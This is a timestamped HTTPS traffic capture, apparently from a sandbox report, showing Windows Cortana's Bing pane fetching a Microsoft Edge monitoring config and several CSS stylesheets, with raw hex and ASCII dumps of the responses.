2024-01-26 09:17:40 UTC	462	OUT	GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: fp.msedge.net Connection: Keep-Alive
2024-01-26 09:17:40 UTC	427	IN	HTTP/1.1 200 OK Cache-Control: public,max-age=900 Content-Length: 17958 Content-Type: application/json; charset=utf-8 ETag: "1474684246" Access-Control-Allow-Origin: * Request-Context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: C91E3655CD754F82BC83F72841CBD8F6 Ref B: BL2EDGE1318 Ref C: 2024-01-26T09:17:40Z Date: Fri, 26 Jan 2024 09:17:40 GMT Connection: close
2024-01-26 09:17:40 UTC	3798	IN	Data Raw: 7b 22 73 22 3a 35 30 30 30 2c 22 6e 22 3a 33 2c 22 65 22 3a 5b 7b 22 65 22 3a 22 2a 2e 61 7a 72 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 6e 72 62 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 34 32 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 61 66 64 78 74 65 73 74 2e 7a 30 31 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 31 7d 2c 7b Data Ascii: {"s":5000,"n":3,"e":[{"e":".azr.footprintdns.com","w":5000,"m":128},{"e":".clo.footprintdns.com","w":2000,"m":1},{"e":".clo.footprintdns.com","w":100,"m":128},{"e":".nrb.footprintdns.com","w":420,"m":3},{"e":"afdxtest.z01.azurefd.net","w":500,"m":1},{
2024-01-26 09:17:40 UTC	4096	IN	Data Raw: 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 6f 68 32 31 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 6f 68 32 32 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 6f 68 32 32 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 64 73 6d 30 36 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d Data Ascii: azure.com","w":3,"m":128},{"e":"doh21prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"doh22prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"doh22prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"dsm06prdapp02-canary.netm
2024-01-26 09:17:40 UTC	4096	IN	Data Raw: 6a 67 61 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 6a 67 61 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6a 67 61 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 6a 68 7a 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a Data Ascii: jga20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":1},{"e":"jga20prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"jga20prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"jhz20prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":
2024-01-26 09:17:40 UTC	4096	IN	Data Raw: 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 70 68 78 31 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 70 68 78 31 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 70 68 78 37 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2d 6f 70 61 70 68 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 70 68 78 38 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2d 6f 70 61 70 Data Ascii: azure.com","w":3,"m":128},{"e":"phx10prdapp01-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"phx10prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"phx70prdapp02-canary-opaph.netmon.azure.com","w":3,"m":128},{"e":"phx80prdapp01-canary-opap
2024-01-26 09:17:40 UTC	1872	IN	Data Raw: 77 22 3a 32 30 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 74 2d 73 31 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 35 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 74 2d 73 32 2d 72 69 6e 67 2e 6d 73 65 64 67 65 2e 6e 65 74 22 2c 22 77 22 3a 32 30 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 74 79 31 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 74 79 6f 32 30 70 72 64 61 70 70 30 31 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 72 65 2e 63 6f 6d 22 2c 22 77 22 3a 33 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 74 79 6f 32 30 70 72 64 61 70 70 30 32 2d 63 61 6e 61 72 79 2e 6e 65 74 6d 6f 6e 2e 61 7a 75 Data Ascii: w":2000,"m":3},{"e":"t-s1-ring.msedge.net","w":50,"m":3},{"e":"t-s2-ring.msedge.net","w":200,"m":3},{"e":"ty1prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"tyo20prdapp01-canary.netmon.azure.com","w":3,"m":128},{"e":"tyo20prdapp02-canary.netmon.azu

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:40 UTC	880	OUT	GET /rb/1c/cir3,ortl,cc,nc/uANxnX_BheDjd2-cdR8N9DEWlds.css?bu=C4kH-ALbA98H0wbABvUEXV1dXQ&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E
2024-01-26 09:17:41 UTC	1210	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Fri, 18 Nov 2022 01:58:05 GMT X-EventID: 6596f0673ea9410b872f6de37fcf7315 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: MWHEEEAP0024FA4 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=117304 Expires: Sat, 27 Jan 2024 17:52:45 GMT Date: Fri, 26 Jan 2024 09:17:41 GMT Content-Length: 20421 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.07a6dc17.1706260661.406dcd12 Timing-Allow-Origin: *
2024-01-26 09:17:41 UTC	15174	IN	Data Raw: 2e 73 77 5f 70 6c 75 73 2c 2e 73 77 5f 75 70 2c 2e 73 77 5f 64 6f 77 6e 2c 2e 73 77 5f 73 74 2c 2e 73 77 5f 73 74 68 2c 2e 73 77 5f 73 74 65 2c 2e 73 77 5f 74 70 63 62 6b 2c 2e 73 77 5f 70 6c 61 79 2c 2e 73 77 5f 70 6c 61 79 64 2c 2e 73 77 5f 70 6c 61 79 61 2c 2e 73 77 5f 70 6c 61 79 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 4d 44 4c 32 20 41 73 73 65 74 73 22 7d 2e 73 77 5f 70 6c 75 73 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 ee 9c 90 22 7d 2e 73 77 5f 70 6c 61 79 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 61 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 64 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 70 3a 61 66 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 63 6f Data Ascii: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:""}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;co
2024-01-26 09:17:41 UTC	5247	IN	Data Raw: 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6c 67 6f 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 61 6e 73 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6e 73 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 61 6c 67 6f 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6e 73 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 6e 61 76 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6c 67 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 6c 69 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 5b 64 69 72 5d 20 2e 62 5f 63 61 70 74 69 6f 6e 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f Data Ascii: pt+script+.b_algo,body[dir] #b_results>.b_ans+script+script+.b_ans,body[dir] #b_results>.b_algo+script+script+.b_ans,body[dir] #b_results>.b_nav+script+script+.b_algo{margin-top:4px}body[dir] #b_results>li>:last-child,body[dir] .b_caption>:last-child,bo

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:41 UTC	859	OUT	GET /rb/49/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E
2024-01-26 09:17:41 UTC	1210	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Thu, 07 Dec 2023 22:46:56 GMT X-EventID: 659de16bd3374d3a86983d88daf90811 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: MWHEEEAP0024F66 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=149102 Expires: Sun, 28 Jan 2024 02:42:43 GMT Date: Fri, 26 Jan 2024 09:17:41 GMT Content-Length: 15967 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.07a6dc17.1706260661.406dcdf2 Timing-Allow-Origin: *
2024-01-26 09:17:41 UTC	15174	IN	Data Raw: 68 74 6d 6c 7b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 62 6f 64 79 5b 64 69 72 5d 20 74 61 62 6c 65 2c 62 6f 64 79 5b 64 69 72 5d 20 74 64 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 53 61 6e 73 2d 53 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 62 6f 64 79 5b 64 69 72 5d 7b 6d 61 72 67 69 6e 3a 30 7d 62 6f 64 79 20 2e 74 61 6c 6c 55 78 7b Data Ascii: html{-ms-user-select:none;overflow-y:hidden;overflow-x:hidden;cursor:default}body[dir] table,body[dir] td{margin:0;padding:0}body{font-size:15px;line-height:20px;font-family:"Segoe UI",Arial,Helvetica,Sans-Serif;color:#000}body[dir]{margin:0}body .tallUx{
2024-01-26 09:17:41 UTC	793	IN	Data Raw: 74 28 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 29 3a 6e 6f 74 28 2e 63 6f 72 74 61 6e 61 49 63 6f 6e 29 20 2e 69 63 6f 6e 20 69 6d 67 7b 77 69 64 74 68 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 31 33 70 78 7d 2e 61 73 50 61 64 64 69 6e 67 20 2e 64 6f 75 62 6c 65 4c 69 6e 65 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 3e 2e 69 63 6f 6e 7b 6d 69 6e 2d 77 69 64 74 68 3a 34 34 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 61 73 50 61 64 64 69 6e 67 20 2e 64 6f 75 62 6c 65 4c 69 6e 65 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 3e 2e 69 63 6f 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 36 70 78 7d 2e 61 73 50 61 64 64 69 6e 67 20 2e 6e 6f 72 6d 61 6c 69 7a 65 64 42 69 67 Data Ascii: t(.secondaryIcon):not(.cortanaIcon) .icon img{width:13px;height:13px}.asPadding .doubleLine .secondaryIcon>.icon{min-width:44px;min-height:44px;max-height:44px}body[dir] .asPadding .doubleLine .secondaryIcon>.icon{padding-top:6px}.asPadding .normalizedBig

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:42 UTC	922	OUT	GET /rb/73/cir3,ortl,cc,nc/mPD4fuJQGcY0PxLeaVGIBZATSng.css?bu=Gd0J2gnvCZ0K5gnjCdQJlArUCfIJ1An8Cf8J1AnUCYUK1AmICpEKiwq2CtQJoArUCd0K&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E
2024-01-26 09:17:42 UTC	1247	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Wed, 24 Jan 2024 18:14:06 GMT X-EventID: 65b20c67eba2417498c36bb08681a37c UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: MWHEEEAP0024FC5 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=338774 Expires: Tue, 30 Jan 2024 07:23:56 GMT Date: Fri, 26 Jan 2024 09:17:42 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.07a6dc17.1706260662.406dceb1 Timing-Allow-Origin: *
2024-01-26 09:17:42 UTC	15137	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2e 73 63 6f 70 65 73 2d 6c 69 73 74 7b 68 65 69 67 68 74 3a 35 32 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 73 63 6f 70 65 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 70 78 20 30 20 31 70 78 7d 2e 7a 65 72 6f 49 6e 70 75 74 31 39 48 31 20 2e 64 61 72 6b 54 68 65 6d 65 20 2e 73 63 6f 70 65 73 2d 6c 69 73 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 32 32 35 2c 32 32 35 2c 32 32 35 2c 2e 31 29 7d 2e 73 63 6f 70 65 73 2d 6c 69 73 74 3e 6c 69 7b 6d 69 6e 2d 77 69 64 74 68 3a 34 38 70 78 7d 2e 73 63 6f 70 65 73 2d 6c 69 Data Ascii: 00006000.scopes-list{height:52px;border-bottom:1px solid rgba(0,0,0,.1);display:flex}body[dir] .scopes-list{padding:0 1px 0 1px}.zeroInput19H1 .darkTheme .scopes-list{border-bottom:1px solid rgba(225,225,225,.1)}.scopes-list>li{min-width:48px}.scopes-li
2024-01-26 09:17:42 UTC	9451	IN	Data Raw: 61 6e 73 70 61 72 65 6e 74 3b 72 69 67 68 74 3a 30 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 2c 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 6f 70 65 6e 42 72 6f 77 73 65 72 42 74 6e 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 6c 65 66 74 3a 30 7d 2e 6f 70 65 6e 42 72 6f 77 73 65 72 42 74 6e 20 2e 6f 70 65 6e 50 72 65 76 69 65 77 49 63 6f 6e 20 2e 69 63 6f 6e 43 6f 6e 74 61 69 6e 65 72 20 2e 69 63 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 23 72 6f 6f 74 3a 6e 6f 74 28 2e 7a 65 72 6f 49 6e 70 75 74 31 39 48 31 29 20 2e 73 61 5f 68 76 2e 61 72 72 6f 77 4f 72 54 61 62 41 63 74 69 6f 6e 2c 23 72 6f 6f 74 3a 6e 6f Data Ascii: ansparent;right:0}body[dir='rtl'] .openPreviewPaneBtn,body[dir='rtl'] .openBrowserBtn{border-right:1px solid transparent;left:0}.openBrowserBtn .openPreviewIcon .iconContainer .icon{font-size:16px}#root:not(.zeroInput19H1) .sa_hv.arrowOrTabAction,#root:no
2024-01-26 09:17:42 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 6c 74 72 27 5d 20 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 62 69 67 49 63 6f 6e 2e 62 69 67 67 65 72 49 63 6f 6e 20 2e 64 65 74 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 34 70 78 7d 62 6f 64 79 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 62 69 67 49 63 6f 6e 2e 62 69 67 67 65 72 49 63 6f 6e 20 2e 64 65 74 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 34 70 78 7d 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 62 69 67 49 63 6f 6e 20 2e 69 63 6f 6e 2c 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 62 69 67 49 63 6f 6e 20 2e 69 63 6f 6e 43 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 36 38 70 78 3b 68 65 69 67 68 74 3a 36 38 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 38 70 78 7d 2e Data Ascii: 00006000ltr'] .topResults .bigIcon.biggerIcon .details{padding-left:104px}body[dir='rtl'] .topResults .bigIcon.biggerIcon .details{padding-right:104px}.topResults .bigIcon .icon,.topResults .bigIcon .iconContainer{width:68px;height:68px;font-size:68px}.
2024-01-26 09:17:42 UTC	8204	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 39 32 70 78 7d 2e 67 72 69 64 4c 61 79 6f 75 74 4d 65 64 69 75 6d 20 2e 73 75 67 67 65 73 74 69 6f 6e 20 2e 69 63 6f 6e 2c 2e 67 72 69 64 4c 61 79 6f 75 74 4d 65 64 69 75 6d 20 2e 73 75 67 67 65 73 74 69 6f 6e 20 2e 69 63 6f 6e 43 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 36 38 70 78 3b 68 65 69 67 68 74 3a 36 38 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 38 70 78 7d 23 72 6f 6f 74 20 2e 74 6f 70 48 69 74 43 6f 6e 6e 65 63 74 65 64 54 6f 47 72 6f 75 70 20 2e 73 75 67 67 65 73 74 69 6f 6e 3a 68 6f 76 65 72 3a 6e 6f 74 28 2e 73 61 5f 68 76 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 31 29 7d 2e 62 5f 73 65 63 6f 6e 64 61 72 79 46 6f 63 75 73 7b 66 6f 6e 74 2d 73 69 7a 65 Data Ascii: x;font-size:92px}.gridLayoutMedium .suggestion .icon,.gridLayoutMedium .suggestion .iconContainer{width:68px;height:68px;font-size:68px}#root .topHitConnectedToGroup 